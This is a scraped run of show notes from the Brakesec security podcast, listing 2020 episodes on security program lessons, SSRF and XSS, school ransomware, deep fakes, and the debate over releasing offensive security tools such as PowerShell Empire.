- Every functional area and specifically the leadership
- Improved communications and availability
- 8 and Up
-
- 'Gotta git gud' at the soft stuff
- Top 50 Chain Restaurant Example
-
- Situation
-
- Doing Chip Reader refreshes across all ~600 locations for PCI Compliance during 2017 window
- Problem
-
- Poor project management on behalf of security team led to project failure
- A security problem became an IT problem
- Contractor to subcontractor to subcontractor added time and complexity
- How do we as security practitioners fix it?
-
- Security managers needs to be aware of how their projects impact others
- Managing up
- Security needs to be interdisciplinary
Government Examples
- Police Department Example
-
- Situation
-
- City Administrator got Spear Phished
- Problem
-
- Spear phishing
- Poor logging
- How do we as security practitioners fix it?
-
- Look for the most basic problems and try to fix them
- Find or create solutions that provide basic capabilities
- Cannot prevent the lowest hanging fruit directly, so impact what you can change
-
- What you can actually do about phishing
- Getting people to do something that you want them to do
- Defense SubContractor Example
-
- Situation
-
- Working with MSP on security issues
- “Do we have a SIEM” email?
- Problem
-
- Company executives have never done due diligence
- Assumed that MSP had it under control
- MSP just did what they normally do and within letter of their contract
- How do we as security practitioners fix it?
-
- Security needs to be proactive
Small Company Examples
- Light Manufacturer Example
-
- Situation
-
- Server not working, Ransomware
- Attackers pivoted through third party accountant access
- Problem
-
- Single Point of Failure (SPOF)
- Vendor Compromise
- How do we as security practitioners solve it?
-
- IT problems become security problems on long enough timeline
- Need to provide actual solutions to business problems
- Security CANNOT be decoupled from business needs
- Telecommunications Provider
-
- Situation
-
- Employee reports CEO was hacked
- Problem
-
- Employee panicked, emailed everyone
- Escalated way beyond what was necessary
- How do we as security practitioners solve it?
-
- Employee education - Boring answer
- What's actually under our control here?
-
- Clear processes for security incidents
- Clear communications channels for employees with IT and security groups
- Knowledge management
- Local NGO Example
-
- Situation
-
- Meeting with Executive Director regarding server failure
- Problem
-
- Mentions that she was sent security guidelines from global parent org
- Got so overwhelmed reading it she just closed it and kept working on something else
- How do we as security practitioners solve it?
-
- We have to make this information digestible and accessible
- We do NOT need to make already dense subject matter even more inaccessible
- When cannot mandate compliance, how do you achieve compliance
-
- More flies with honey than vinegar
- Build relationships - Layer 8 strikes again
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
2020-015-Tanya_Janca-Using Github Actions in your Devops Environment, workflow automation
Github actions - https://github.com/features/actions
How are these written?
It looks like a marketplace format? How do they maintain code quality?
What does it take setup the actions?
It looks like IFTTT for DevOps?
What kind of integrations does it allow for? Will it handle logins or API calls for you?
Is it moderated in some way? What’s the acceptance criteria for these?
What are you trying to accomplish by using Github Actions?
What are the benefits of using these over XX product?
What is gained by using this?
Mention twitch Channel and when (join the mailing list)
Github actions “Twitch.tv/shehackspurple”
Coaching, Project Management, Scrum Management
Alice and Bob learn Application Security - Wylie - Fall/Winter 2020
Links:
https://mailchi.mp/e2ab45528831/shehackspurple
https://twitter.com/shehackspurple
https://medium.com/@shehackspurple
https://www.youtube.com/shehackspurple
https://www.twitch.tv/shehackspurple
https://www.linkedin.com/in/tanya-janca
https://github.com/shehackspurple/
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: April 21, 2020Pwnysec tutorial on all things XSS
Brakesec contributor @Pwnysec on Twitter has created a new video highlighting the importance of testing for XSS in your environment, also:
Discusses the different types of XSS you can find (stored, reflected, and DOM)
Tools you can employ to find and detect XSS
Method and ways to prevent it from happening
If you're into #bugbounties, this is a great primer to maximize your earning potential. Hope you enjoy!
https://youtu.be/GtCxPGwQpsU
Published on: April 21, 20202020-014-Server Side Request Forgery defense, Tanya Janca, AppSec discussion
Tanya's AppSec Course
https://www.shehackspurple.dev/server-side-request-forgery-ssrf-defenses
https://www.shehackspurple.dev
Server-side request forgery - https://portswigger.net/web-security/ssrf
What are differences between Stored XSS and SSRF?
This requires a MITM type of issue?
Doesn’t stored XSS get stored on the server?
What conditions must exist for SSRF to be possible?
What mitigations need to be in place for mitigation of SSRF? CORS? CSP?
Would a WAF or mod_security be effective?
Can it be completely mitigated or are there still ways around it?
Part2 -next week
Github actions - https://github.com/features/actions
How are these written?
It looks like a marketplace format? How do they maintain code quality?
What does it take setup the actions?
It looks like IFTTT for DevOps?
What kind of integrations does it allow for? Will it handle logins or API calls for you?
Is it moderated in some way? What’s the acceptance criteria for these?
What are you trying to accomplish by using Github Actions?
What are the benefits of using these over XX product?
What is gained by using this?
Mention twitch Channel and when (join the mailing list)
Github actions “Twitch.tv/shehackspurple”
Coaching, Project Management, Scrum Management
Alice and Bob learn Application Security - Wylie - Fall/Winter 2020
Links:
https://mailchi.mp/e2ab45528831/shehackspurple
https://twitter.com/shehackspurple
https://medium.com/@shehackspurple
https://www.youtube.com/shehackspurple
https://www.twitch.tv/shehackspurple
https://www.linkedin.com/in/tanya-janca
https://github.com/shehackspurple/
Tanya Janca
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: April 14, 20202020-013- part 2, education security, ransomware, april mardock, Nathan McNulty, and Jared folkins
April Mardock - CISO - Seattle Public Schools
Jared Folkins - IT Engineer - Bend La Pine Schools
Nathan McNulty - Information Security Architect - Beaverton School District
OpSecEdu - https://www.opsecedu.com/
Slack
https://www.a4l.org/default.aspx
BEC - https://www.trendmicro.com/vinfo/us/security/definition/business-email-compromise-(bec)
https://www.k12cybersecurityconference.org/
Bypassing security controls - https://www.goguardian.com/blog/technology/how-students-bypass-school-web-filters-and-how-to-stop-them/
https://community.spiceworks.com/topic/2077711-chromebook-google-docs-bypassing-filters
https://www.mobicip.com/blog/here%E2%80%99s-how-kids-bypass-apple%E2%80%99s-parental-control-tools
https://www.phantomts.com/2020/01/11/kids-can-bypass-communication-limit-feature-on-ios-13-3/
https://www.ocregister.com/2009/02/17/students-accused-of-changing-grades-using-teachers-password/
Security persons at education institutions of varying sizes.
https://www.zdnet.com/article/texas-school-district-falls-for-scam-email-hands-over-2-3-million/
Why are schools soft targets?
Is money/budget the reason schools get the raw deal here?
Why is ransomware such an appealing attack?
How complex is the school environment?
Mobile, tablets, hostile users, hostile external forces
Adding technology too quickly? Outpacing the infrastructure in schools?
Just ideas for some questions. - Jared
Do you find vendors are very responsive in the education space when receiving a vulnerability report?
https://www.edweek.org/ew/articles/2019/09/10/parent-who-criticized-his-sons-math-program.html
When students, who you are trying to educate, when they are found doing something inappropriate, how do Districts handle it?
https://ktvz.com/news/2017/11/08/mtn-view-hs-bomb-threat-traced-to-eugene-14-year-old/
What challenges do Security people in education face when partnering with their user base?
Unlike a corporate setting, many educators and students need to install different software throughout the year, how is that handled?
How did April, Nathan, and Jared meet?
Is the technology stack in your various school systems changed much in the last 10 years? Have you moved to cloud based, or do you still have an IT shack at the school systems with physical machines?
Localadmins are not granted… (excellent!)
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: April 7, 20202020-012-April Mardock, Nathan McNulty, Jared Folkins, school security, ransomware attacks
April Mardock - CISO - Seattle Public Schools
Jared Folkins - IT Engineer - Bend La Pine Schools
Nathan McNulty - Information Security Architect - Beaverton School District
OpSecEdu - https://www.opsecedu.com/
Slack
https://www.a4l.org/default.aspx
BEC - https://www.trendmicro.com/vinfo/us/security/definition/business-email-compromise-(bec)
https://www.k12cybersecurityconference.org/
Bypassing security controls - https://www.goguardian.com/blog/technology/how-students-bypass-school-web-filters-and-how-to-stop-them/
https://community.spiceworks.com/topic/2077711-chromebook-google-docs-bypassing-filters
https://www.mobicip.com/blog/here%E2%80%99s-how-kids-bypass-apple%E2%80%99s-parental-control-tools
https://www.phantomts.com/2020/01/11/kids-can-bypass-communication-limit-feature-on-ios-13-3/
https://www.ocregister.com/2009/02/17/students-accused-of-changing-grades-using-teachers-password/
Security persons at education institutions of varying sizes.
https://www.zdnet.com/article/texas-school-district-falls-for-scam-email-hands-over-2-3-million/
Why are schools soft targets?
Is money/budget the reason schools get the raw deal here?
Why is ransomware such an appealing attack?
How complex is the school environment?
Mobile, tablets, hostile users, hostile external forces
Adding technology too quickly? Outpacing the infrastructure in schools?
Just ideas for some questions. - Jared
Do you find vendors are very responsive in the education space when receiving a vulnerability report?
https://www.edweek.org/ew/articles/2019/09/10/parent-who-criticized-his-sons-math-program.html
When students, who you are trying to educate, when they are found doing something inappropriate, how do Districts handle it?
https://ktvz.com/news/2017/11/08/mtn-view-hs-bomb-threat-traced-to-eugene-14-year-old/
What challenges do Security people in education face when partnering with their user base?
Unlike a corporate setting, many educators and students need to install different software throughout the year, how is that handled?
How did April, Nathan, and Jared meet?
Is the technology stack in your various school systems changed much in the last 10 years? Have you moved to cloud based, or do you still have an IT shack at the school systems with physical machines?
Localadmins are not granted… (excellent!)
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 29, 20202020-011-Alyssa miller, deep fakes, threatmodeling for Devops environments, and virtual conferences
https://twitter.com/AlyssaM_InfoSec/status/1159877471161839617?s=19
Looking forward to sharing my vision for ending the 60 year cycle of bad defense strategies in #infosec and my challenge to think about security in a more effective way. https://sched.co/TAqU
#DianaInitiative2019 #cdwsocial
1961 - MIT - CTSS - https://en.wikipedia.org/wiki/Compatible_Time-Sharing_System
Egg, coconut, brick ( my example of security --brbr)
Start with critical assets
Layer outward, not perimeter in.
Medieval castles
Create the keep, build out from that
Active defenses
Dover Castle - https://en.wikipedia.org/wiki/Dover_Castle#/media/File:1_dover_castle_aerial_panorama_2017.jpg
Detection defenses - watchguards
Mitigation defenses - moats - give time/space to respond (network segmentation)
Active countermeasures - knights/archers/cannons
DeepFake technology
Election year
Spoke at RSA
Business threat?
“Outsider trading”
“Video of Elon talking about problems - fake…”
Stocks tank - short
https://www.vice.com/en_us/article/ywyxex/deepfake-of-mark-zuckerberg-facebook-fake-video-policy
Could it be done strategically to destabilize things
Extort business leaders
Fake videos used to extort
Still difficult to create
What’s the hurdles stopping it from being mainstream?
Huge render farms?
https://www.youtube.com/watch?v=18LN7VQM1aw - deepfake Sharon Stone/ Steve Buscemi
Threat modeling in devSecOps
Agile env needs to be quick, fast, and
Build it into user stories
Shostack’s method is a bit weighty
How do we implement that in such a way to make dev want to do them?
Organizing Virtual cons
https://Allthetalks.online - April 15
24 hour conference for charity
Talks, followed by interactive channels, community generation
Virtual Lobbycon
Comedian
CFP is open 01 April 2020
Sticker swap!
Bsides Atlanta
27-29 March
https://bsidesatl.org/ - All virtual this weekend!
Infosec Oasis
https://Infosecoasis.com - 18 April
https://mashable.com/article/zoom-conference-call-work-from-home-privacy-concerns/
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 25, 20202020-010-Dave Kennedy, offensive security tool release, Derbycom, and Esports
Dave Kennedy (@hackingDave)
TrustedSec
Released SEToolkit, Pentester Framework (PTF)
PoC release for “Shitrix” bug (was disclosed after Google zero initiative India group)
Jeff Snover, Lee Holmes - Powershell gods
Arguments against release
Tools are released are utilized by the ‘bad guys’
Tooling makes it more difficult to fingerprint who are who they say they are “Fuzzy Weasel Vs. Psycho Toads”
Makes the bad guys job harder by making them have to create the PoC (presumably most bad actors are skids)
Arguments for release
Tools allow for teaching Blue team, and SIEM/logging systems to understand
Learning how something was created, being able to break down the vulnerability
https://www.bleepingcomputer.com/news/security/new-evasion-encyclopedia-shows-how-malware-detects-virtual-machines/
Show #2:
DerbyCom - Tell us about it
Dave Kennedy Center for gaming and Leadship https://twitter.com/hackingdave/status/1220150360779710464?lang=en
Offensive Security Tool release (PowerShell Empire 3.0)
Powershell is re-released, using Python:
https://twitter.com/BCSecurity1/status/1209126652300709888
Initial tweet:
https://twitter.com/taosecurity/status/1209132572128747520
“We believe that Powershell and Empire framework will remain a major threat vector employed by APTs, malware authors, and Red Teams.” SO WHY ARE YOU UPDATING IT? You are improving capabilities you explicitly say are *used by bad guys.* Scottie, beam me up from this bizarro world.
Affirmations and evidence:
https://twitter.com/taosecurity/status/1209287582439395330
Nope. One example: Iranian APT “CopyKittens” uses Powershell Empire. Incidentally, I found this example via
. https://clearskysec.com/tulip/
https://twitter.com/michael_yip/status/1209151868036886528
One can innovate without sharing with the adversary no? It’s literally how the defense industry work or am I missing something?
https://twitter.com/michael_yip/status/1209247219796398083
… “Are we really justifying lowering the R&D cost of the adversary is the only way to attract talent to the defensive side. Not to mention - no one is saying developing OST is wrong. It’s the way they're being shared that’s problematic”
https://twitter.com/2sec4u/status/1209169724799623169?s=20
The whole idea is that actors can't just git clone an advanced post exploitation framework which bypasses 95% of organisations defences. It should cost actors time & money to bypass these defences but because red team keep releasing new stuff with bypasses... the cycle continues.
Comments in Support of initial argument
https://twitter.com/IISResetMe/status/1209180945011621889?s=20
I really _want_ to agree. ... but I also work in an org with million dollar budgets, a dozen full-time detection engineers and analysts and an army of devs and sysadmins, and even we are having a hard time keeping up - how does this arms race "help" non-F500 orgs?
(later discussion does mention that he has a hard time seeing it as net negative) https://twitter.com/IISResetMe/status/1209183774182907904?s=20
https://twitter.com/cnoanalysis/status/1209169633460150272?s=20
“If we don’t create the offensive tools then the bad guys will!” That is a terrible argument for OST release. “We might as well do something that harms because someone else will do that eventually anyway...” there are so many logical fallacies I don’t have enough space
Rebuttals
https://twitter.com/r3dQu1nn/status/1209207550731677697
Limiting yourself by not exposing more tooling to defenders is NOT how to improve security. Yikes. The more exposure you provide defenders gives you more detection's/IOC's you can build to help defend against APT's. That's the whole point of Proactive security.
https://twitter.com/bettersafetynet/status/1209138002473160707
It's vital that we continue to sharpen our swords. The commoditization of attacker techniques allows better defense against what adversaries are doing.
https://twitter.com/dragosr/status/1209213064446279680
And this whole discussion ignores a simple fact that released information is way better than exploits passed around quietly or kept in stockpile caches regardless of anyone’s metric of responsibility (which is a debatable, very hypothetical line of what’s acceptable or not).
https://twitter.com/bettersafetynet/status/1209139099979923457
The very fact that you and others who are taking this side are trying to cajole and brow beat to this position shows how weak your argument is. MITRE ATT&CK took off like gang-busters not because they had a better trolling game, but because it was a great idea implemented well.
https://twitter.com/bettersafetynet/status/1209139578579275776
It's odd that those who advocate this position point out these reports while ignoring all the vendor patches, all the hardening guidelines, basically all the technical defensive work that ops teams do. Nobody's doubting attackers use these techniques, we doubt your conclusions.
https://twitter.com/bettersafetynet/status/1209154592560353280
My stance is likely to tick off both sides here. I think there are times that limited release is good. But over and over, we've seen where vendors do not change until something is publicly released.
It's odd that those who advocate this position point out these reports while ignoring all the vendor patches, all the hardening guidelines, basically all the technical defensive work that ops teams do. Nobody's doubting attackers use these techniques, we doubt your conclusions.
https://twitter.com/r3dQu1nn/status/1209346356151631873
Security is a service that can be improved with products. Having no security or limiting exposure to offensive tool sets increases the chances of a breach. Ethical hackers sole purpose is to help make Blue better. Which is why purple teams are a great resource for any company.
https://twitter.com/ippsec/status/1209354476072689664?s=20
To the people upset by public red team tools. If you cant detect open source tools than what chance do you have at detecting private one off tools. It’s much easier to automate a battle against 100 duck sized horses than it is to face off against a single horse sized duck.
Defender Classification of PowerShell Empire 3.0
https://www.bc-security.org/post/the-empire-3-0-strikes-back
Is there a way to protect against it?
Where does this sit in the ATT&CK Matrix?
Features:
Enhanced Windows Evasion vs. Defender
DPAPI support for “PSCredential” and “SecureString”
AMSI bypasses
JA3/S signature Randomization
New Mimikatz version intergration
Curveball test (CryptoAPI test scripts)
Dave’s new Esport initiative (opens in February): https://twitter.com/HackingDave/status/1220150360779710464
DERBYCON community updates
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 19, 20202020-009-Dave Kennedy, Offensive Tool release (Part 1)
Dave Kennedy (@hackingDave)
TrustedSec
Released SEToolkit, Pentester Framework (PTF)
PoC release for “Shitrix” bug (was disclosed after Google zero initiative India group)
Jeff Snover, Lee Holmes - Powershell gods
Arguments against release
Tools are released are utilized by the ‘bad guys’
Tooling makes it more difficult to fingerprint who are who they say they are “Fuzzy Weasel Vs. Psycho Toads”
Makes the bad guys job harder by making them have to create the PoC (presumably most bad actors are skids)
Arguments for release
Tools allow for teaching Blue team, and SIEM/logging systems to understand
Learning how something was created, being able to break down the vulnerability
https://www.bleepingcomputer.com/news/security/new-evasion-encyclopedia-shows-how-malware-detects-virtual-machines/
Show #2:
DerbyCom - Tell us about it
Dave Kennedy Center for gaming and Leadship https://twitter.com/hackingdave/status/1220150360779710464?lang=en
Offensive Security Tool release (PowerShell Empire 3.0)
Powershell is re-released, using Python:
https://twitter.com/BCSecurity1/status/1209126652300709888
Initial tweet:
https://twitter.com/taosecurity/status/1209132572128747520
“We believe that Powershell and Empire framework will remain a major threat vector employed by APTs, malware authors, and Red Teams.” SO WHY ARE YOU UPDATING IT? You are improving capabilities you explicitly say are *used by bad guys.* Scottie, beam me up from this bizarro world.
Affirmations and evidence:
https://twitter.com/taosecurity/status/1209287582439395330
Nope. One example: Iranian APT “CopyKittens” uses Powershell Empire. Incidentally, I found this example via
. https://clearskysec.com/tulip/
https://twitter.com/michael_yip/status/1209151868036886528
One can innovate without sharing with the adversary no? It’s literally how the defense industry work or am I missing something?
https://twitter.com/michael_yip/status/1209247219796398083
… “Are we really justifying lowering the R&D cost of the adversary is the only way to attract talent to the defensive side. Not to mention - no one is saying developing OST is wrong. It’s the way they're being shared that’s problematic”
https://twitter.com/2sec4u/status/1209169724799623169?s=20
The whole idea is that actors can't just git clone an advanced post exploitation framework which bypasses 95% of organisations defences. It should cost actors time & money to bypass these defences but because red team keep releasing new stuff with bypasses... the cycle continues.
Comments in Support of initial argument
https://twitter.com/IISResetMe/status/1209180945011621889?s=20
I really _want_ to agree. ... but I also work in an org with million dollar budgets, a dozen full-time detection engineers and analysts and an army of devs and sysadmins, and even we are having a hard time keeping up - how does this arms race "help" non-F500 orgs?
(later discussion does mention that he has a hard time seeing it as net negative) https://twitter.com/IISResetMe/status/1209183774182907904?s=20
https://twitter.com/cnoanalysis/status/1209169633460150272?s=20
“If we don’t create the offensive tools then the bad guys will!” That is a terrible argument for OST release. “We might as well do something that harms because someone else will do that eventually anyway...” there are so many logical fallacies I don’t have enough space
Rebuttals
https://twitter.com/r3dQu1nn/status/1209207550731677697
Limiting yourself by not exposing more tooling to defenders is NOT how to improve security. Yikes. The more exposure you provide defenders gives you more detection's/IOC's you can build to help defend against APT's. That's the whole point of Proactive security.
https://twitter.com/bettersafetynet/status/1209138002473160707
It's vital that we continue to sharpen our swords. The commoditization of attacker techniques allows better defense against what adversaries are doing.
https://twitter.com/dragosr/status/1209213064446279680
And this whole discussion ignores a simple fact that released information is way better than exploits passed around quietly or kept in stockpile caches regardless of anyone’s metric of responsibility (which is a debatable, very hypothetical line of what’s acceptable or not).
https://twitter.com/bettersafetynet/status/1209139099979923457
The very fact that you and others who are taking this side are trying to cajole and brow beat to this position shows how weak your argument is. MITRE ATT&CK took off like gang-busters not because they had a better trolling game, but because it was a great idea implemented well.
https://twitter.com/bettersafetynet/status/1209139578579275776
It's odd that those who advocate this position point out these reports while ignoring all the vendor patches, all the hardening guidelines, basically all the technical defensive work that ops teams do. Nobody's doubting attackers use these techniques, we doubt your conclusions.
https://twitter.com/bettersafetynet/status/1209154592560353280
My stance is likely to tick off both sides here. I think there are times that limited release is good. But over and over, we've seen where vendors do not change until something is publicly released.
It's odd that those who advocate this position point out these reports while ignoring all the vendor patches, all the hardening guidelines, basically all the technical defensive work that ops teams do. Nobody's doubting attackers use these techniques, we doubt your conclusions.
https://twitter.com/r3dQu1nn/status/1209346356151631873
Security is a service that can be improved with products. Having no security or limiting exposure to offensive tool sets increases the chances of a breach. Ethical hackers sole purpose is to help make Blue better. Which is why purple teams are a great resource for any company.
https://twitter.com/ippsec/status/1209354476072689664?s=20
To the people upset by public red team tools. If you cant detect open source tools than what chance do you have at detecting private one off tools. It’s much easier to automate a battle against 100 duck sized horses than it is to face off against a single horse sized duck.
Defender Classification of PowerShell Empire 3.0
https://www.bc-security.org/post/the-empire-3-0-strikes-back
Is there a way to protect against it?
Where does this sit in the ATT&CK Matrix?
Features:
Enhanced Windows Evasion vs. Defender
DPAPI support for “PSCredential” and “SecureString”
AMSI bypasses
JA3/S signature Randomization
New Mimikatz version intergration
Curveball test (CryptoAPI test scripts)
Dave’s new Esport initiative (opens in February): https://twitter.com/HackingDave/status/1220150360779710464
DERBYCON community updates
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 12, 2020
2020-008-Nemesis_Taylor Mutch
Nemesis: https://github.com/UnityTech/nemesis
Nemesis - a auditing tool to check against a set of benchmarks (CIS GCP only)
https://en.wikipedia.org/wiki/Center_for_Internet_Security
What does CIS do well?
What do the CIS benchmarks do poorly?
K8s workload identity - GKE specific
github.com/TaylorMutch
@mutchsecure
Amazon STS tokens
https://www.eventbrite.com/e/bsides-seattle-2020-tickets-86351434465
https://www.zdnet.com/article/texas-school-district-falls-for-scam-email-hands-over-2-3-million/
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 4, 20202020-007-Roberto_Rodriguez-threat_hunting-juypter_notebooks_data-science
Brakesec Podcast is now on Pandora! Find us here: https://pandora.app.link/p9AvwdTpT3
Book club
